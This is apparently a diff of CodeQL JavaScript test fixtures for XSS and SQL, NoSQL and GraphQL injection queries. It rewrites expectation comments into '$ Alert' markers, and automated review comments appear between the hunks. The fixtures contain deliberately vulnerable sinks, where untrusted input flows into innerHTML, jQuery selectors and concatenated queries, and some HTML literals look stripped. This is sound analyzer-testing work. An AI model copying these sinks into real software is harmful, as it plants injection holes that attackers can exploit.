b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..369643121368 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js 
@@ -1,15 +1,15 @@ module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); @@ -19,13 +19,13 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { const markdown = require('markdown-it')({html: true}); module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert } } 
@@ -59,35 +59,35 @@ $.fn.xssPlugin = function (options) { }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } module.exports.types = function (val) { if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } module.exports.usesCreateHTML = function (x) { 
@@ -96,24 +96,24 @@ module.exports.usesCreateHTML = function (x) { const myMermaid = require('mermaid'); module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK + myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..a00719d74408 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } export function insertIntoCreatedDocument(s: string) { const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { 
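Review bot: The comment on `newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM.` classifies the alert as a false positive, but that holds only while nothing from `newDoc` is later adopted into the live document; markup assigned into an inert document created by `createHTMLDocument` becomes live once its nodes are moved into the page. The function as written never does that, so the classification is fine, but the comment should state the assumption it rests on, e.g. `// $ SPURIOUS: Alert - newDoc is never attached to the main DOM, so the markup stays inert`. `insertIntoCreatedDocument` is complete within the hunk.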
@@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..896c4f8af210 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,63 +1,63 @@ (function(){ $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; 
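Review bot: `$(options); // $ Alert - or is it?` keeps the old comment's open question beside an expectation that now definitively asserts an alert; an expectation marker should not carry text that second-guesses it. Either drop the trailing clause or replace it with the reason the alert is wanted, e.g. `$(options); // $ Alert - options is unconstrained and may be a string`, which is consistent with the `typeof target != "string"` guard later in the same plugin body being treated as safe. The `@@ -152,22 +152,22 @@` hunk of this file has the same kind of leftover in `$(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion);`, where the parentheses and trailing semicolon survived while the sibling line above it was normalised to `// OK - unlikely to be a html/css prefix confusion`.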
@@ -65,20 +65,20 @@ $.fn.my_plugin = function my_plugin(element, options) { this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $(options.foo.bar.baz); // $ Alert + $(options.html); }; $.fn.my_plugin = function my_plugin(options) { - $(x).appendTo(options.foo.bar.baz); // NOT OK + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; $.fn.my_plugin = function my_plugin(options) { @@ -87,7 +87,7 @@ var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,7 +95,7 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; $.fn.my_plugin = function my_plugin(options) { @@ -103,8 +103,8 @@ menu: '
', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { @@ -113,38 +113,38 @@ }; $.fn.my_plugin = function my_plugin(options) { options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.extend($.fn, { my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert } }); $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
hello
`; - $(intentional1); // OK + $(intentional1); let intentional2 = `
${options.target}
`; - $(intentional2); // OK + $(intentional2); let intentional3 = `
` + options.target `
`; - $(intentional3); // OK + $(intentional3); let unintentional = `
`; $(unintentional); // OK - but should be flagged by another query @@ -152,22 +152,22 @@ $.fn.my_plugin = function my_plugin(options) { let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } 
@@ -176,10 +176,10 @@ $.fn.my_plugin = o.f } setupPlugin({f: function(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); $.fn.position = function( options ) { @@ -189,14 +189,14 @@ // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..e9ca1f400890 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -13,24 +13,24 @@ export class Foo { safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..c78fc9284a15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -6,10 +6,10 @@ const FormikBasic = () => ( { - $("#id").html(values.foo); // NOT OK + $("#id").html(values.foo); // $ Alert }} onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -22,19 +22,19 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), validate: values => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert }, handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' @@ -42,7 +42,7 @@ import { Form } from 'react-final-form' const App = () => (
{ - $("#id").html(values.stooge); // NOT OK + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -69,7 +69,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + $("#id").html(data.name); // $ Alert }; return ( @@ -90,7 +90,7 @@ function HookForm2() { type="button" onClick={() => { const values = getValues(); // { test: "test-input", test1: "test1-input" } - $("#id").html(values.name); // NOT OK + $("#id").html(values.name); // $ Alert }} > @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..69812f74e847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js 
@@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); 
@@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. 
+ $.jGrowl($("input").get(0).name); // $ Alert let selector = $("input").get(0).name; if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); const text = $("text").text(); - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); 
@@ -128,31 +128,31 @@ class Sub extends Super { const wSelection = getSelection(); const dSelection = document.getSelection(); let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..c80586686af9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -4,6 +4,6 @@ const pool = mysql.createPool(getConfig()); let temp = process.env['foo']; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..3db62486e260 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -11,7 +11,7 @@ app.use(bodyParser.json()); app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; @@ -19,6 +19,6 @@ declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..df6be3893b2d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -6,8 +6,7 @@ const kit = new Octokit(); app.get('/post/:id', function(req, res) { const id = req.params.id; - // NOT OK - const response = kit.graphql(` + const response = kit.graphql(` // $ Alert query { repository(owner: "github", name: "${id}") { object(expression: "master:foo") { 
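Review bot: In the graphql.js hunk the marker on `const response = kit.graphql(\` // $ Alert` sits after the opening backtick, so it is part of the template literal's string content rather than a JavaScript comment; unless the expectation parser also scans string contents (not visible from this series so far), this expectation will not be recognised and the alert on this call will be reported as unexpected. The same placement recurs in the later hunk of this file at `query: \`{ // $ Alert` inside the `JSON.stringify` body. A form that stays a real comment on the call's line, such as `const response = kit.graphql(/* $ Alert */ \``, would avoid changing the query text as well, provided the framework accepts block comments; otherwise the `.expected` output for this test should be checked for an unexpected-result line here.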
@@ -24,13 +23,13 @@ import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); @@ -41,11 +40,11 @@ app.get('/article/:id/', async function(req, res) { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as Core } from "@octokit/rest"; @@ -53,9 +52,9 @@ const kit2 = new Core(); app.get('/event/:id/', async function(req, res) { const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; @@ -72,7 +71,7 @@ var root = { app.get('/thing/:id', async function(req, res) { const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert fetch("https://my-grpahql-server.com/graphql", { method: "POST", 
@@ -80,8 +79,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK - query: `{ + query: `{ // $ Alert thing { name url @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -117,5 +115,5 @@ app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..ade09ab6104e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -13,6 +13,6 @@ const connection = mysql.createConnection({ app.use(route.get('/test1', (context, param1) => { param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..121044ae5a14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js 
@@ -24,15 +24,15 @@ app.post('/documents/find', (req, res) => { const query = JSON.parse(req.query.data); if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -50,15 +50,15 @@ app.post('/documents/insert', (req, res) => { const query = JSON.parse(req.query.data); const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..e07fa929063c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..c3a3eb840aef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js 
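Review bot: In the json-schema-validator.js hunk, `doc.find(query); // $ SPURIOUS: Alert` drops the rationale that the old `// OK - but still flagged [INCONSISTENCY]` carried, so a later reader cannot tell why this result is marked spurious rather than fixed. The earlier `$ SPURIOUS: Alert` conversion in this patch (the `MembershipTestSanitizer` case in the jQuery plugin test) kept its explanation after a dash; the same style here would be `doc.find(query); // $ SPURIOUS: Alert - validateAsync() succeeded, but the query is still flagged`. Keeping the reason also makes it easier to remove the `SPURIOUS` marker once the query handles this case.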
